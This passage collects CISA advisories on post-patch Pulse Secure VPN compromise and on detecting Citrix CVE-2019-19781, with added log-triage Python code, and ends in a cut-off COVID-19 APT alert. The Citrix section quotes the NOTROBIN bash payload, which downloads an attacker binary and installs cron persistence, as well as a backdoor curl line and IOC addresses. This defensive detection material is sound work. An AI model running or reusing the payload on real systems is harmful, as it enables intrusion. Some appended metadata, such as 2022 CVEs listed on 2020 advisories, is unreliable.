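        reasons.append(f"resolves outside the web tree to {resolved}")
    return reasons


def triage(log_text):
    """Scan constructed log lines; return {client_ip: [(target, reason), ...]}."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if m["ua"] in IOC_USER_AGENTS:
            reasons.append("user agent listed in the advisory IOCs")
        for reason in reasons:
            findings[m["ip"]].append((m["target"], reason))
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG).items():
        print(ip)
        for target, reason in hits:
            print(f"  {reason}: {target}")
```

Note that the last sample line is flagged on user agent alone: it requests a normal login page, which matches the advisory's observation that post-compromise connections use valid credentials and do not look like exploitation.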
Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.

In one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.

In other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim’s network environment if they lost their primary connection.

### Initial Detection

Conventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services.

An intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer’s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.

### Post-Compromise Detection and IOC Detection Tool

Given that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.

To detect past exploitation of CVE-2019-11510, network administrators should:

 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.)
##### Figure 5: Checkbox that enables logging exploit attacks

 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as `../../../data` (see figure 6).

##### Figure 6: Strings for detection of lateral movement

 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.
 4. Run CISA’s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA’s GitHub page](<https://github.com/cisagov/check-your-pulse> "cisagov / check-your-pulse" ) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.

### Indicators of Compromise

CISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.

CISA observed the following user agents with this activity:

 * `Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0`
 * `Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
 * `Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36`

CISA also observed:

 * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections.
See table 1 for hashes of files used.
 * A threat actor “living off the land” and utilizing `C:\Python\ArcGIS` to house malicious PE files, as well as using natively installed Python.
 * A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088

##### Table 1: Filenames and hashes of files used by a threat actor

Filename | MD5
---|---
t.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5
g.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579

For a downloadable copy of IOCs, see STIX file.

### Mitigations

CISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If—after applying the detection measures in this alert—organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and service accounts.

CISA also recommends that organizations:

 * Look for unauthorized applications and scheduled tasks in their environment.
 * Remove any remote access programs not approved by the organization.
 * Remove any remote access trojans.
 * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.

If organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying it back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.

### Contact Information

To report suspicious activity related to information found in this joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

**References**

[[1] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> "Pulse Secure Community" )

[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> "Pulse Secure Community" )

[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> "XMPPwocky" )

[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23).](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> "OpenSecurity Forums" )

[[5] GitHub. BishopFox / pwn-pulse.](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> "BishopFox / pwn-pulse" )

[[6] File disclosure in Pulse Secure SSL VPN (Metasploit)](<https://www.exploit-db.com/exploits/47297> "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)" )

[[7] Twitter. @alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> "Twitter" )

[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23).](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> "OpenSecurity Forums" )

[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31).](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> "OpenSecurity Forums" )

[[10] Twitter.
@alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> "Twitter" )

### Revisions

April 16, 2020: Initial Version

October 23, 2020: Revision

September 05, 2023: Revision

Source record metadata for this advisory: title "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching"; ID AA20-107A; published 2020-10-24; CVE list CVE-2019-11510, CVE-2022-42475, CVE-2022-47966; CVSS v3.1 base score 10.0 (CRITICAL), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; CVSS v2 base score 7.5 (HIGH), vector AV:N/AC:L/Au:N/C:P/I:P/A:P; <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a>

Next source record (AA20-031A, "Detecting Citrix CVE-2019-19781"):

### Summary

Unknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)

Though mitigations were released on the same day Citrix announced
CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.

Compromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.

Contact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.

### Technical Details

## Detection

CISA has developed the following procedures for detecting a CVE-2019-19781 compromise.

#### HTTP Access and Error Log Review

**Context:** Host Hunt

**Type:** Methodology

The impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`.
Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.

 * `'*/../vpns/*'`
 * `'*/vpns/cfg/smb.conf'`
 * `'*/vpns/portal/scripts/newbm.pl*'`
 * `'*/vpns/portal/scripts/rmbm.pl*'`
 * `'*/vpns/portal/scripts/picktheme.pl*'`

Note: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)

Per TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a `GET` request to an XML file. If any exploitation activity exists—attempted or successful—analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak’s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)

```
10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT "
10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"
```

Additionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)

```
grep -iE 'POST.*\.pl HTTP/1\.1\" 200 ' /var/log/httpaccess.log -A 1
grep -iE 'GET.*\.xml HTTP/1\.1\" 200' /var/log/httpaccess.log -B 1
```

#### Running Processes Review

**Context:** Host Hunt

**Type:** Methodology

Reviewing the running processes on a system suspected of compromise for processes running
under the `nobody` user can identify potential backdoors.

`ps auxd | grep nobody`

Analysts should review the `ps` output for suspicious entries such as this:

```
nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `– sh -c uname & curl -o – http://10.1.1.2/backdoor
```

Further pivoting can be completed using the Process ID from the `ps` output:

`lsof -p <pid>`

Due to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.

### Checking for NOTROBIN Presence

**Context:** Host Hunt

**Type:** Methodology

```
pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"
```

The above is the NOTROBIN Bash exploit code. To check for NOTROBIN presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.

Running the command `find / -name ".init" 2> /tmp/error.log` should return the path to the created staging directory while redirecting all of the errors into a file located at `/tmp/error.log`.

### Additional /var/log Review

**Context:** Host Hunt

**Type:** Methodology

Analysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`.
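Returning to the HTTP Access and Error Log Review section above, the following is an added Python example (not code from this advisory, TrustedSec, FireEye or the Sigma project) that applies the two checks that section describes to an `httpaccess.log` excerpt: matching the listed URI wildcard patterns, and pairing a successful `POST` to a `.pl` script with a subsequent successful `GET` of an `.xml` file from the same source. The sample input is the two TrustedSec lines quoted above plus one constructed benign line, and the 60-second pairing window is an assumption chosen for the demo.

```python
import re
from datetime import datetime, timedelta
from fnmatch import fnmatch

# Constructed httpaccess.log excerpt: the two lines are the TrustedSec sample
# quoted above (Apache combined format), followed by one benign constructed line.
SAMPLE_HTTPACCESS = """\
10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT "
10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"
10.1.1.9 - - [10/Jan/2020:13:24:10 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# URI patterns listed in this section (from the referenced Sigma rule); the
# shell-style wildcards are evaluated with fnmatch.
EXPLOIT_URI_PATTERNS = [
    "*/../vpns/*",
    "*/vpns/cfg/smb.conf",
    "*/vpns/portal/scripts/newbm.pl*",
    "*/vpns/portal/scripts/rmbm.pl*",
    "*/vpns/portal/scripts/picktheme.pl*",
]

# Apache combined log format: ip ident user [timestamp] "METHOD uri proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "uri": m["uri"],
        "status": int(m["status"]),
    }


def matches_exploit_uri(uri):
    """True if the URI matches any of the advisory's exploit URI patterns."""
    return any(fnmatch(uri, pattern) for pattern in EXPLOIT_URI_PATTERNS)


def attempted_exploit_ips(log_text):
    """Sources that requested an exploit URI (an attempt, not proof of success)."""
    entries = filter(None, map(parse_line, log_text.splitlines()))
    return sorted({e["ip"] for e in entries if matches_exploit_uri(e["uri"])})


def find_exploit_sequences(log_text, window=timedelta(seconds=60)):
    """Return (post, get) pairs that match the TrustedSec success indicator:
    a 200 POST to a .pl under /vpn or via /../, followed within `window` by a
    200 GET of an .xml file from the same source. Lines are assumed to be in
    chronological order, as they are in a live access log."""
    entries = list(filter(None, map(parse_line, log_text.splitlines())))
    pairs = []
    for i, post in enumerate(entries):
        if not (post["method"] == "POST" and post["status"] == 200
                and post["uri"].endswith(".pl")
                and ("/../" in post["uri"] or "/vpn" in post["uri"])):
            continue
        for get in entries[i + 1:]:
            if get["ts"] - post["ts"] > window:
                break  # chronological order: nothing later can still qualify
            if (get["ip"] == post["ip"] and get["method"] == "GET"
                    and get["status"] == 200 and get["uri"].endswith(".xml")):
                pairs.append((post, get))
                break
    return pairs


if __name__ == "__main__":
    print("attempt sources:", attempted_exploit_ips(SAMPLE_HTTPACCESS))
    for post, get in find_exploit_sequences(SAMPLE_HTTPACCESS):
        delay = (get["ts"] - post["ts"]).seconds
        print(f"{post['ip']}: POST {post['uri']} then GET {get['uri']} ({delay}s later)")
```

The pattern match alone only proves an attempt; the POST-then-GET pairing is what the blog post treats as evidence that the written template was served back, so the two results are reported separately.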
Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.

**bash.log**

Sample Log Entry:

```
Jan 10 13:35:47
<local7.notice> ns bash[63394]: nobody on /dev/pts/3
shell_command="hostname"
```

Note: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.

**sh.log**

**notice.log**

### Check Crontab for Persistence

**Context:** Host Hunt

**Type:** Methodology

As with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:

`crontab -l -u nobody`

### Existence of Unusual Files

**Context:** Host Hunt

**Type:** Methodology

Open-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.

 * `/netscaler/portal/templates`
 * `/var/tmp/netscaler/portal/templates`

### Snort Alerts

**Context:** Network Alert

**Type:** Signatures

Although most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability.
The following Snort rules were provided in FireEye’s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.

```
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .CONF response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"al]|0d0a|"; distance:0; content:"encrypt passwords"; distance:0; content:"name resolve order"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .PL response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"|0d0a|Connection: Keep-Alive"; content:"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e742e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f5343524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)
```

### Suspicious Network Traffic

**Context:** Network Hunt

**Type:** Methodology

From a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL).
Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring, and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.

Given that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing.
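The outbound-traffic logic of this section, including the load-balancing exception just described, as an added Python example that is not code from this advisory and not a Splunk search: it takes constructed bro/Zeek-style connection records and separates the connections the appliance itself initiates into external destinations (the backdoor C2 case) and internal destinations that are not on a known back-end list (the lateral-movement case). The appliance address, the internal range and the back-end list are assumptions for the demo and do not come from the advisory.

```python
import ipaddress
from collections import Counter

# Assumed values for the demo: the appliance address, the internal range, and the
# back-end servers the ADC legitimately load-balances to. None of these come from
# the advisory; replace them with your own inventory.
CITRIX_IP = ipaddress.ip_address("10.1.1.5")
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
KNOWN_BACKENDS = {
    (ipaddress.ip_address("10.1.2.10"), 443),  # web farm behind the ADC
    (ipaddress.ip_address("10.1.2.11"), 443),
}

# Constructed connection records (src, dst, dst_port), e.g. from a bro/Zeek conn log.
SAMPLE_CONN = [
    ("203.0.113.9", "10.1.1.5", 443),      # inbound client to the gateway: expected
    ("10.1.1.5", "10.1.2.10", 443),        # ADC to a known back end: expected
    ("10.1.1.5", "10.1.2.10", 443),
    ("10.1.1.5", "10.1.2.11", 443),
    ("10.1.1.5", "198.51.100.77", 443),    # ADC initiating outbound to the internet
    ("10.1.1.5", "198.51.100.77", 443),
    ("10.1.1.5", "198.51.100.77", 80),
    ("10.1.1.5", "10.1.3.40", 445),        # ADC to internal hosts that are not back ends
    ("10.1.1.5", "10.1.3.41", 445),
]


def is_internal(ip):
    """True if the address falls inside one of the assumed internal ranges."""
    return any(ip in net for net in INTERNAL_NETS)


def classify_outbound(records):
    """Split connections the appliance initiates into two Counters keyed by
    (dst, port): external destinations (backdoor C2 candidates) and internal
    destinations that are not on the known back-end list (lateral movement
    candidates). Inbound connections and known back ends are ignored."""
    external, internal_unexpected = Counter(), Counter()
    for src, dst, port in records:
        if ipaddress.ip_address(src) != CITRIX_IP:
            continue
        dst_ip = ipaddress.ip_address(dst)
        if not is_internal(dst_ip):
            external[(dst, port)] += 1
        elif (dst_ip, port) not in KNOWN_BACKENDS:
            internal_unexpected[(dst, port)] += 1
    return external, internal_unexpected


def top_outbound(records, limit=5):
    """Same shape as the Splunk search in this section: count by destination, sort descending."""
    external, _ = classify_outbound(records)
    return external.most_common(limit)


if __name__ == "__main__":
    external, lateral = classify_outbound(SAMPLE_CONN)
    print("outbound to external hosts:", top_outbound(SAMPLE_CONN))
    print("internal, not a known back end:", sorted(lateral))
```

Keeping the back-end allow list explicit is what separates legitimate load-balancer traffic from the internal scanning or SMB activity the section warns about; without it every internal connection from the ADC would be an alert.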
As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).

**Inbound Exploitation Activity (Suspicious URIs)**

```
index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml
```

**Outbound Traffic Search (Backdoor C2)**

```
index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>
| stats count by src dest dest_port
| sort -count
```

The following resources provide additional detection measures.

 * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.
 * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)
 * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)

## Impact

CVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild.
An attacker can exploit this vulnerability to take control of an affected system.

The vulnerability affects the following appliances:

 * Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12
 * Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 11.1.63.15
 * Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 12.0.63.13
 * Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 12.1.55.18
 * Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 13.0.47.24
 * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

### Mitigations

The resources provided include steps for standalone, HA pairs, and clustered Citrix instances.

 * Use Citrix's tool to check for the vulnerability.
   * <https://support.citrix.com/article/CTX269180>
 * Use an open-source utility to check for the vulnerability or previous device compromise.
   * <https://github.com/cisagov/check-cve-2019-19781>
   * <https://github.com/x1sec/citrixmash_scanner>
   * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>
 * Follow instructions from Citrix to mitigate the vulnerability.
   * <https://support.citrix.com/article/CTX267679>
   * <https://support.citrix.com/article/CTX267027>
 * Upgrade firmware to a patched version.
   * Subscribe to Citrix Alerts for firmware updates.
     * <https://support.citrix.com/user/alerts>
   * Patch devices to the most current version.
\n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link 
to the Australian Cyber Security Centre script

Source record metadata for this advisory: title "Detecting Citrix CVE-2019-19781"; ID AA20-031A; published 2020-05-21; CVE list CVE-2019-19781, CVE-2022-42475, CVE-2022-47966; CVSS v3.1 base score 9.8 (CRITICAL), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 base score 7.5 (HIGH), vector AV:N/AC:L/Au:N/C:P/I:P/A:P; <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a>

Next source record:

### Summary

**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).**

CISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses.
It describes some of the methods these actors are using to target organizations and provides mitigation advice.

The joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA’s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).

### COVID-19-related targeting

APT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.

APT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.

The pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy or acquire sensitive data on COVID-19-related research.

### Targeting of pharmaceutical and research organizations

CISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit.
Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently, CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. 
These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute-force attack in which the attacker tries a single, commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to 